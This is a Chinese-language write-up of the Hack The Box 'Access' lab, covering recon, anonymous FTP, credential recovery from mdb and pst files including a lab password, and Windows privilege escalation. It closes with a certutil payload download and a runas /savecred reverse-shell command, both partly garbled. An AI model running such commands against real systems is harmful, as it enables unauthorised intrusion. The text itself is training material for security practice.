2023年11月23日发(作者:)
hackthebox-AccessWriteup
⼀、摘要
Acces是搭建在Windows平台上的⼀道CTF题⽬,探究服务器上的渗透测试
⼆、信息搜集
题⽬就只给出⼀个IP:10.10.10.98
⾸先通过Nmap进⾏端⼝⽅⾯的探测
nmap -sV -sT -sC 10.10.10.98
服务器⼀共开放了21/Ftp、23/Telnet、80/Http端⼝,优先⽅问Http去看看⽹站
三、Web端测试
访问Web端⼝时,就出现了⼀个机房的照⽚,但是并没有从中看出什么端倪。
随后利⽤gobuster对⽹站⽬录进⾏了枚举
只跑到/aspnet_client页⾯
⽽/aspnet_client是403禁⽌的
四、另寻他路
之前Nmap扫描的时候有在21端⼝后⾯出现⼀句话
ftp-anon: Anonymous FTP login allowed (FTP code 230)
告诉我们FTP可以匿名登陆
进⼊Backups发现有个mdb⽂件,随后下载它
不得不说太⼤了
emmmm,不知道什么原因,随后请教⼤佬。说是要以⼆进制⽅式去下载⽂件,可以防⽌数据的丢失
如果是linux系统,利⽤mdbtools⼯具打开
mdb-tables
其中有个auth_user表名值得关注
mdb-export auth_user
其中engineer关键词很熟悉,正好是FTP上的另⼀个⽬录的
去ftp上打开另⼀个⽬录,发现⼀个ZIP⽂件,并下载
发现打开提取⽂件需要密码
这⾥遇到个⽑病,估计是解压缩的问题,密码⼀直错误,最后换到Kali下居然就可以
pst是Microsoft Outlook电⼦邮件⽂件夹
直接下载⼀个Outlook查看了邮件
他说4Cc3ssC0ntr0ller就是账户security的密码
随后想到开放了23端⼝,便Telnet上去
五、权限提升
因为在CTF⾥,提权⼀般有⾃带的漏洞⽂件,如⼀个软件、⼀个脚本等
所以按照思路,去找相关⽂件
⼀般来,Linux下通过find找有suid的⽂件;windows下⼀般在⽤户⽬录下
有Administrator、Public、security三个⽤户
经判断,只有公共⽬录三可以利⽤的(因为administrator⽬录进不去)
进⼊public桌⾯发现有⼀个lnk⽂件
⽤type查看内容
其中还跟上了/savecred参数,这说明保存了系统的凭证,可以通过这个runas反弹⼀个shell
cmd下可以通过以下命令下载
certutil -urlcache -split -f /
再利⽤runas反弹shell
runas /user:Administrator /savecred " -c 1337"
发布评论